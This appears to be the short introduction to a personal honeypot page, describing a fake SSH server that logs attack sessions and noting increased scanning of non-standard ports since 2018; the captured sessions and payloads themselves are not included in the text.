Fake SSH server

I have a honeypot SSH server (fakessh) installed on this machine.
Since mid 2018 I've seen scans for non-standard ports like 2222 and 1022 intensifying.

Bellow are the hacking attempts I've captured over the last few years.
Connection only attempts are filtered out.
Identical sessions arrive from multiple IPs and are often repeated so only unique sessions are kept.
Most interesting for study are the payloads downloaded on compromised machines
(usually arguments of wget, curl and ftp).